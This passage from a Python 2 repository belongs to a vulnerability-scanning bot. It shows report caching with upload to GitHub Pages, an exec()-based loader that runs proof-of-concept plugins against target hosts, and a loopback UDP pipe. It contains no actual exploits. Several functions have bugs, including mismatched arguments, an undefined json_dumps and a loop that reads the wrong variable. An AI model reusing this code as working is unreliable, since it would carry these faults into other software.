poc_report_cache.__inside_cache[report_name]['site_data'] = site_data 106 | poc_report_cache.__inside_cache[report_name]['analysis_report'] = analysis_report_data 107 | 108 | poc_report_cache.__thread_lock.exit_lock() 109 | 110 | ''' 111 | PoC Report Operate API -- Github API 112 | ''' 113 | 114 | class poc_operate_api : 115 | 116 | __poc_report_root_directory = github_organization_name + '.github.io' + local_system.get_system_directory_separator() \ 117 | + 'vuln_report_data' + local_system.get_system_directory_separator() 118 | 119 | @staticmethod 120 | def is_exist_report(vuln_report_name) : 121 | return local_system.is_exist_directory(poc_operate_api.__poc_report_root_directory + vuln_report_name) 122 | 123 | ''' 124 | @staticmethod 125 | def load_report(vuln_report_name) : 126 | if poc_operate_api.is_exist_report(vuln_report_name) : 127 | report_dir = poc_operate_api.__poc_report_root_directory + vuln_report_name + local_system.get_system_directory_separator() 128 | site_data_json_file = report_dir + 'site_data.json' 129 | analysis_report_json_file = report_dir + 'analysis_report.json' 130 | 131 | if local_system.is_exist_file(site_data_json_file) and local_system.is_exist_file(analysis_report_json_file) : 132 | site_data_file_content = local_system.read_file(site_data_json_file) 133 | analysis_report_file_content = local_system.read_file(analysis_report_json_file) 134 | 135 | site_data_file_content_json = json.loads(site_data_file_content) 136 | analysis_report_file_content_json = json.loads(analysis_report_file_content) 137 | 138 | poc_report_cache.add_report(vuln_report_name,site_data_file_content_json,analysis_report_file_content_json) 139 | 140 | return True 141 | 142 | return False 143 | ''' 144 | 145 | @staticmethod 146 | def create_report(vuln_report_name) : 147 | if not poc_operate_api.is_exist_report(vuln_report_name) : 148 | report_dir = poc_operate_api.__poc_report_root_directory + vuln_report_name + local_system.get_system_directory_separator() 149 | 150 | local_system.create_directory(report_dir) 151 | 152 | site_data_json_file = report_dir + 'site_data.json' 153 | analysis_report_json_file = report_dir + 'analysis_report.json' 154 | 155 | local_system.write_file(site_data_json_file,json.dumps({})) 156 | local_system.write_file(analysis_report_json_file,json.dumps({})) 157 | 158 | poc_report_cache.add_report(vuln_report_name) 159 | 160 | return True 161 | 162 | return False 163 | 164 | @staticmethod 165 | def upload_report(vuln_report_name) : 166 | if poc_operate_api.is_exist_report(vuln_report_name) : 167 | # local_system.debug_print(vuln_report_name) 168 | 169 | update_report(vuln_report_name) # WARNING ! git pull before git push . 170 | # try git push it will make git error that remote repository is lastly but local is not lastly .. 171 | 172 | report_dir = poc_operate_api.__poc_report_root_directory + vuln_report_name + local_system.get_system_directory_separator() 173 | site_data_json_file = report_dir + 'site_data.json' 174 | analysis_report_json_file = report_dir + 'analysis_report.json' 175 | 176 | updated_site_data = json.loads(local_system.read_file(site_data_json_file)) 177 | updated_analysis_report = json.loads(local_system.read_file(analysis_report_json_file)) 178 | 179 | temporary_scan_data_list = poc_report_cache.get_report_site_data(vuln_report_name) 180 | 181 | if not None == temporary_scan_data_list : 182 | for temporary_scan_data_index in temporary_scan_data_list : 183 | temporary_value = temporary_scan_data_list[temporary_scan_data_index] 184 | 185 | if updated_site_data.has_key(temporary_scan_data_index) : 186 | updated_site_data[temporary_scan_data_index] += temporary_value 187 | else : 188 | updated_site_data[temporary_scan_data_index] = temporary_value 189 | 190 | local_system.write_file(site_data_json_file,json_dumps(updated_site_data)) 191 | 192 | temporary_analysis_data_list = poc_report_cache.get_report_analysis_report(vuln_report_name) 193 | 194 | if not None == temporary_analysis_data_list : 195 | for temporary_analysis_data_index in temporary_analysis_data_list : 196 | temporary_value = temporary_scan_data_list[temporary_analysis_data_index] 197 | 198 | if updated_analysis_report.has_key(temporary_analysis_data_index) : 199 | updated_analysis_report[temporary_analysis_data_index] += temporary_value 200 | else : 201 | updated_analysis_report[temporary_analysis_data_index] = temporary_value 202 | 203 | local_system.write_file(analysis_report_json_file,json_dumps(updated_analysis_report)) 204 | 205 | if not None == temporary_scan_data_list or not None == temporary_scan_data_list : 206 | github_api.report_tool_kit.upload_report(github_organization_name + '.github.io') 207 | 208 | poc_report_cache.clear_report_site_data(vuln_report_name) 209 | poc_report_cache.clear_report_analysis_report(vuln_report_name) 210 | 211 | @staticmethod 212 | def update_report() : 213 | report_dir = poc_operate_api.__poc_report_root_directory + vuln_report_name + local_system.get_system_directory_separator() 214 | 215 | github_api.report_tool_kit.update_report(github_organization_name + '.github.io') 216 | 217 | ''' 218 | PoC Report Queue -- Flash Vuln Data to Github 219 | ''' 220 | 221 | class poc_report_update_queue : 222 | 223 | __report_update_queue = [] 224 | __thread_lock = local_system.thread_lock() 225 | __update_wait_time = 30 # update report interval is 30s 226 | __check_queue_interval_time = 5 227 | __queue_dispatch_loop = False 228 | 229 | class report_information : 230 | 231 | def __init__(self,report_name) : 232 | self.report_name = report_name 233 | self.entry_to_queue_time_tick = local_system.get_timetick() 234 | 235 | def get_report_name(self) : 236 | return self.report_name 237 | 238 | def get_timetick(self) : 239 | return self.entry_to_queue_time_tick 240 | 241 | @staticmethod 242 | def add_report(report_name) : 243 | new_report_information = poc_report_update_queue.report_information(report_name) 244 | 245 | poc_report_update_queue.__thread_lock.enter_lock() 246 | 247 | poc_report_update_queue.__report_update_queue.append(new_report_information) 248 | 249 | poc_report_update_queue.__thread_lock.exit_lock() 250 | 251 | @staticmethod 252 | def exit_dispatch() : 253 | poc_report_update_queue.__queue_dispatch_loop = False 254 | 255 | @staticmethod 256 | def run_dispatch() : 257 | if not poc_report_update_queue.__queue_dispatch_loop : # check dispatch thread running state .. 258 | local_system.create_thread(poc_report_update_queue.__queue_dispatch) 259 | 260 | @staticmethod 261 | def __queue_dispatch() : 262 | poc_report_update_queue.__queue_dispatch_loop = True 263 | 264 | while poc_report_update_queue.__queue_dispatch_loop : 265 | # try # 266 | current_time_tick = local_system.get_timetick() 267 | # local_system.debug_print('Debug Current TimeTick:' + str(current_time_tick)) 268 | 269 | poc_report_update_queue.__thread_lock.enter_lock() # WARNING ! lock it at first will making the queue avoid rewrite 270 | # new report will add to queue when it call thread_lock.exit_lock() 271 | 272 | report_queue_length = len(poc_report_update_queue.__report_update_queue) 273 | report_queue_index = 0 274 | 275 | while report_queue_index < report_queue_length : 276 | queue_report_name = poc_report_update_queue.__report_update_queue[report_queue_index].get_report_name() 277 | queue_time_tick = poc_report_update_queue.__report_update_queue[report_queue_index].get_timetick() 278 | 279 | # local_system.debug_print('Debug Report Name:' + queue_report_name) 280 | # local_system.debug_print('Debug TimeTick:' + str(queue_time_tick)) 281 | 282 | if current_time_tick - queue_time_tick > poc_report_update_queue.__update_wait_time : 283 | # WARNING ! python time tick taking three decimal places 284 | # so we don't need multiply 1000 for adject time tick to integer 285 | 286 | if not poc_operate_api.is_exist_report(queue_report_name) : # report no exist .. 287 | poc_operate_api.create_report(queue_report_name) 288 | 289 | continue 290 | 291 | poc_operate_api.upload_report(queue_report_name) 292 | 293 | poc_report_update_queue.__report_update_queue.pop(report_queue_index) 294 | 295 | report_queue_length -= 1 296 | else : 297 | report_queue_index += 1 298 | 299 | poc_report_update_queue.__thread_lock.exit_lock() 300 | 301 | local_system.sleep(poc_report_update_queue.__check_queue_interval_time) 302 | 303 | 304 | if __name__ == '__main__' : # test_case 305 | ''' 306 | poc_report_update_queue.run_dispatch() 307 | poc_report_update_queue.add_report('A') 308 | poc_report_update_queue.add_report('B') 309 | poc_report_update_queue.add_report('C') 310 | 311 | import time 312 | 313 | time.sleep(5) 314 | 315 | poc_report_update_queue.exit_dispatch() 316 | ''' 317 | ''' 318 | def create_web_report(report_name,report_description = '',report_readme_information = '') : 319 | github_api.report_tool_kit.create_report(github_organization_name, \ 320 | github_authorization_key, \ 321 | report_name + '.github.io', \ 322 | report_description, \ 323 | report_readme_information, \ 324 | is_organization_repository = True) 325 | 326 | 327 | def create_normal_report(report_name,report_description = '',report_readme_information = '') : 328 | github_api.report_tool_kit.create_report(github_organization_name, \ 329 | github_authorization_key, \ 330 | report_name, \ 331 | report_description, \ 332 | report_readme_information, \ 333 | is_organization_repository = True) 334 | 335 | def delete_report(report_name) : 336 | github_api.report_tool_kit.delete_report(github_organization_name,github_authorization_key,report_name) 337 | ''' 338 | 339 | -------------------------------------------------------------------------------- /poc_framework_scan_plugin.py: -------------------------------------------------------------------------------- 1 | 2 | import sys 3 | 4 | import local_system 5 | 6 | 7 | poc_plugin_directory = 'KiMi_VulnBot_PoC_Plugin' 8 | poc_plugin_entry_function_name = 'valid_vuln' 9 | poc_plugin_prefix_name = '__poc_' 10 | poc_plugin_python_extension_name = '.py' 11 | 12 | sys.path.append(poc_plugin_directory) # load_plugin_directory 13 | 14 | 15 | def get_plugin() : 16 | files = local_system.get_directory_files(local_system.get_current_path() + poc_plugin_directory) 17 | poc_plugin_list = [] 18 | 19 | for file_index in files : 20 | if file_index.startswith(poc_plugin_prefix_name) and file_index.endswith(poc_plugin_python_extension_name) : 21 | poc_plugin_name = file_index[file_index.find(poc_plugin_prefix_name) + len(poc_plugin_prefix_name) : \ 22 | file_index.rfind(poc_plugin_python_extension_name)] 23 | 24 | poc_plugin_list.append(poc_plugin_name) 25 | 26 | if len(poc_plugin_list) : 27 | return poc_plugin_list 28 | 29 | return None 30 | 31 | def is_exist_plugin(plugin_name) : 32 | poc_plugin_file_path = local_system.get_current_path() + poc_plugin_directory + local_system.get_system_directory_separator() 33 | poc_plugin_file_path += poc_plugin_prefix_name + plugin_name + poc_plugin_python_extension_name 34 | 35 | return local_system.is_exist_file(poc_plugin_file_path) 36 | 37 | def call_plugin(plugin_name,host,port = 80,other = {}) : 38 | plugin_name = poc_plugin_prefix_name + plugin_name 39 | 40 | exec('import ' + plugin_name) 41 | exec('plugin_function_list = dir(' + plugin_name + ')') # TIPS : plugin_name is string ,dir() need a module object 42 | 43 | if not poc_plugin_entry_function_name in plugin_function_list : 44 | raise ValueError,'Load PoC Plugin Error ,Can\'t Found Plugin Entry Function ..' 45 | 46 | result_value = False 47 | 48 | try : 49 | exec('result_value = ' + plugin_name + '.' + poc_plugin_entry_function_name + '(host,port,other)') 50 | except Exception,e : # WARNING ! collect plugin exception instead of that crash the scan framework .. 51 | raise Warning,'Running Plugin valid_vuln() Error ..\n' + e.message 52 | 53 | # exec('del ' + plugin_name) # TIPS : import python library will free after return by function 54 | 55 | return result_value 56 | 57 | 58 | if __name__ == '__main__' : # test case .. 59 | ''' 60 | test_plugin_name = 'test' 61 | 62 | print get_plugin() 63 | 64 | start_time = local_system.get_timetick() 65 | 66 | for index in range(10000) : 67 | call_plugin(test_plugin_name,'') 68 | 69 | print 'Using Time :' + str(local_system.get_timetick() - start_time) # 0.417999 s 70 | ''' 71 | -------------------------------------------------------------------------------- /poc_framework_socket_pipe.py: -------------------------------------------------------------------------------- 1 | 2 | import socket 3 | 4 | 5 | class local_loop_address : 6 | 7 | ipv4 = '127.0.0.1' 8 | 9 | class pipe_dispatch : 10 | 11 | pipe_dispatch_port = 10010 12 | __pipe_dispatch_socket = None 13 | __pipe_receive_buffer_length = 4096 14 | 15 | @staticmethod 16 | def init_pipe() : 17 | sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) 18 | 19 | sock.setblocking(True) 20 | sock.bind((local_loop_address.ipv4,pipe_dispatch.pipe_dispatch_port)) 21 | 22 | pipe_dispatch.__pipe_dispatch_socket = sock 23 | 24 | @staticmethod 25 | def pipe_write(data) : 26 | pipe_dispatch.__pipe_dispatch_socket.sendto(data,(local_loop_address.ipv4,pipe_console.pipe_console_port)) 27 | 28 | @staticmethod 29 | def pipe_read() : 30 | data,address = pipe_dispatch.__pipe_dispatch_socket.recvfrom(pipe_dispatch.__pipe_receive_buffer_length) 31 | 32 | if local_loop_address.ipv4 == address[0] : 33 | return data 34 | 35 | return None 36 | 37 | class pipe_console : 38 | 39 | pipe_console_port = pipe_dispatch.pipe_dispatch_port + 1 40 | __pipe_console_socket = None 41 | __pipe_receive_buffer_length = 4096 42 | 43 | @staticmethod 44 | def init_pipe() : 45 | sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) 46 | 47 | sock.setblocking(True) 48 | sock.bind((local_loop_address.ipv4,pipe_console.pipe_console_port)) 49 | 50 | pipe_console.__pipe_console_socket = sock 51 | 52 | @staticmethod 53 | def pipe_write(data) : 54 | pipe_console.__pipe_console_socket.sendto(data,(local_loop_address.ipv4,pipe_dispatch.pipe_dispatch_port)) 55 | 56 | @staticmethod 57 | def pipe_read() : 58 | data,address = pipe_console.__pipe_console_socket.recvfrom(pipe_console.__pipe_receive_buffer_length) 59 | 60 | if local_loop_address.ipv4 == address[0] : 61 | return data 62 | 63 | return None 64 | 65 | 66 | if __name__ == '__main__' : # test case .. 67 | pipe_dispatch.init_pipe() 68 | pipe_console.init_pipe() 69 | pipe_dispatch.pipe_write('AAAAAA') 70 | 71 | print pipe_console.pipe_read() 72 | -------------------------------------------------------------------------------- /readme.md: -------------------------------------------------------------------------------- 1 | 2 | ### KiMi 漏洞感知机器人 3 | 4 | --------------------------------------------------------------------------------